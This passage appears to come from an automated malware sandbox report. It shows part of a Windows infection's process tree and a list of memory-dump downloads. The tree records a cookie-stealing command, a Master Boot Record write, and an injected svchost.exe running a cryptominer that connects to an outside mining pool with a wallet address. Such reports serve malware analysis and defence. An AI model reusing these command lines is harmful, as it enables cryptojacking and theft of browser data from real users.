                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: MapViewOfSection
                                      PID:4456
                                    • C:\Users\Admin\AppData\Local\Temp\80DC.exe
                                      C:\Users\Admin\AppData\Local\Temp\80DC.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:4788
                                    • C:\Users\Admin\AppData\Local\Temp\8DFC.exe
                                      C:\Users\Admin\AppData\Local\Temp\8DFC.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:932
                                      • C:\Users\Admin\AppData\Local\Temp\8DFC.exe
                                        C:\Users\Admin\AppData\Local\Temp\8DFC.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Checks SCSI registry key(s)
                                        • Suspicious behavior: MapViewOfSection
                                        PID:2324
                                    • C:\Users\Admin\AppData\Local\Temp\BB56.exe
                                      C:\Users\Admin\AppData\Local\Temp\BB56.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:1472
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4940
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        2⤵
                                        • Executes dropped EXE
                                        PID:936
                                    • C:\Windows\SysWOW64\vnalonll\bdyexku.exe
                                      C:\Windows\SysWOW64\vnalonll\bdyexku.exe /d"C:\Users\Admin\AppData\Local\Temp\4E7D.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:1680
                                      • C:\Windows\SysWOW64\svchost.exe
                                        svchost.exe
                                        2⤵
                                        • Drops file in System32 directory
                                        • Suspicious use of SetThreadContext
                                        • Modifies data under HKEY_USERS
                                        PID:960
                                        • C:\Windows\SysWOW64\svchost.exe
                                          svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                                          3⤵
                                            PID:2088
                                      • C:\Users\Admin\AppData\Local\Temp\AA6B.exe
                                        C:\Users\Admin\AppData\Local\Temp\AA6B.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Drops startup file
                                        PID:4448
                                        • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                          "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:3208
                                      • C:\Users\Admin\AppData\Local\Temp\B2F7.exe
                                        C:\Users\Admin\AppData\Local\Temp\B2F7.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:1504
                                      • C:\Users\Admin\AppData\Local\Temp\B70F.exe
                                        C:\Users\Admin\AppData\Local\Temp\B70F.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Writes to the Master Boot Record (MBR)
                                        PID:4016

                                      Network

                                      MITRE ATT&CK Enterprise v6

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • memory/200-132-0x00007FFB04CD0000-0x00007FFB04D4E000-memory.dmp

                                        Filesize

                                        504KB

                                        Download

                                      • memory/316-264-0x0000000008DE0000-0x0000000008DE1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-314-0x000000000C030000-0x000000000C031000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-300-0x000000000B550000-0x000000000B551000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-298-0x000000000B0A0000-0x000000000B0A1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-267-0x0000000008D40000-0x0000000008D41000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-268-0x0000000008D80000-0x0000000008D81000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-296-0x000000000AF50000-0x000000000AF51000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-294-0x000000000A760000-0x000000000A761000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-295-0x000000000A930000-0x000000000A931000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-270-0x0000000009A70000-0x0000000009A71000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-265-0x0000000008C90000-0x0000000008CB2000-memory.dmp

                                        Filesize

                                        136KB

                                        Download

                                      • memory/316-260-0x00000000063B0000-0x00000000063E1000-memory.dmp

                                        Filesize

                                        196KB

                                        Download

                                      • memory/316-257-0x00000000063B0000-0x00000000063B1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-266-0x00000000092E0000-0x00000000092E1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-261-0x0000000006550000-0x0000000006551000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-262-0x000000006F250000-0x000000006F93E000-memory.dmp

                                        Filesize

                                        6.9MB

                                        Download

                                      • memory/316-263-0x00000000065C0000-0x00000000065E3000-memory.dmp

                                        Filesize

                                        140KB

                                        Download

                                      • memory/316-297-0x000000000B010000-0x000000000B011000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/316-269-0x00000000098F0000-0x00000000098F1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/832-114-0x00007FFB04CD0000-0x00007FFB04D4E000-memory.dmp

                                        Filesize

                                        504KB

                                        Download

                                      • memory/932-289-0x00000000062D0000-0x00000000062D1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/932-288-0x00000000062D0000-0x00000000062D1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/960-348-0x0000000008C10000-0x000000000901B000-memory.dmp

                                        Filesize

                                        4.0MB

                                        Download

                                      • memory/960-345-0x0000000000740000-0x0000000000746000-memory.dmp

                                        Filesize

                                        24KB

                                        Download

                                      • memory/960-349-0x0000000000A10000-0x0000000000A17000-memory.dmp

                                        Filesize

                                        28KB

                                        Download

                                      • memory/960-346-0x0000000000750000-0x0000000000760000-memory.dmp

                                        Filesize

                                        64KB

                                        Download

                                      • memory/960-321-0x00000000006D0000-0x00000000006E5000-memory.dmp

                                        Filesize

                                        84KB

                                        Download

                                      • memory/960-347-0x00000000007F0000-0x00000000007F5000-memory.dmp

                                        Filesize

                                        20KB

                                        Download

                                      • memory/960-344-0x0000000004550000-0x000000000475F000-memory.dmp

                                        Filesize

                                        2.1MB

                                        Download

                                      • memory/1184-299-0x0000000000790000-0x0000000000791000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/1504-342-0x0000000005160000-0x0000000005161000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/1680-319-0x0000000005000000-0x0000000005001000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/1716-330-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/1780-184-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/1780-185-0x0000000000750000-0x0000000000751000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2008-246-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2088-350-0x00000000032F0000-0x00000000033E1000-memory.dmp

                                        Filesize

                                        964KB

                                        Download

                                      • memory/2252-327-0x000000000064E000-0x000000000064F000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2252-278-0x0000000002160000-0x0000000002161000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2324-290-0x0000000000400000-0x000000000040C000-memory.dmp

                                        Filesize

                                        48KB

                                        Download

                                      • memory/2632-138-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/2712-47-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/2712-50-0x0000000070E60000-0x000000007154E000-memory.dmp

                                        Filesize

                                        6.9MB

                                        Download

                                      • memory/2712-53-0x000000000E920000-0x000000000E921000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/2712-55-0x0000000010B80000-0x0000000010B81000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3012-313-0x00000000032E0000-0x00000000032F7000-memory.dmp

                                        Filesize

                                        92KB

                                        Download

                                      • memory/3012-287-0x0000000001280000-0x0000000001296000-memory.dmp

                                        Filesize

                                        88KB

                                        Download

                                      • memory/3012-187-0x0000000001260000-0x0000000001276000-memory.dmp

                                        Filesize

                                        88KB

                                        Download

                                      • memory/3100-234-0x0000000006320000-0x0000000006321000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3200-232-0x0000000002270000-0x0000000002271000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3208-354-0x0000000006470000-0x0000000006471000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3208-353-0x0000000006470000-0x0000000006471000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3448-169-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/3640-331-0x000000000064E000-0x000000000064F000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3640-282-0x00000000020A0000-0x00000000020A1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3648-212-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/3844-98-0x00000000039A0000-0x0000000003E51000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/3844-82-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/3904-103-0x0000000010000000-0x0000000010057000-memory.dmp

                                        Filesize

                                        348KB

                                        Download

                                      • memory/3904-102-0x00007FFB04CD0000-0x00007FFB04D4E000-memory.dmp

                                        Filesize

                                        504KB

                                        Download

                                      • memory/3996-127-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4016-343-0x00000000063C0000-0x00000000063C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4204-80-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4204-95-0x00000000041B0000-0x0000000004661000-memory.dmp

                                        Filesize

                                        4.7MB

                                        Download

                                      • memory/4204-146-0x00000000064C0000-0x00000000064C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4216-237-0x00000000021D0000-0x00000000021D1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4448-338-0x00000000064B0000-0x00000000064B1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4456-272-0x00000000063C0000-0x00000000063C1000-memory.dmp

                                        Filesize

                                        4KB

                                        Download

                                      • memory/4512-144-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4520-109-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4620-122-0x00007FFB04CD0000-0x00007FFB04D4E000-memory.dmp

                                        Filesize

                                        504KB

                                        Download

                                      • memory/4680-151-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4700-59-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4708-35-0x0000000010000000-0x00000000100E3000-memory.dmp

                                        Filesize

                                        908KB

                                        Download

                                      • memory/4736-119-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4796-67-0x0000000010000000-0x000000001033D000-memory.dmp

                                        Filesize

                                        3.2MB

                                        Download

                                      • memory/4796-63-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/4836-173-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download

                                      • memory/5044-179-0x00000000722E0000-0x0000000072373000-memory.dmp

                                        Filesize

                                        588KB

                                        Download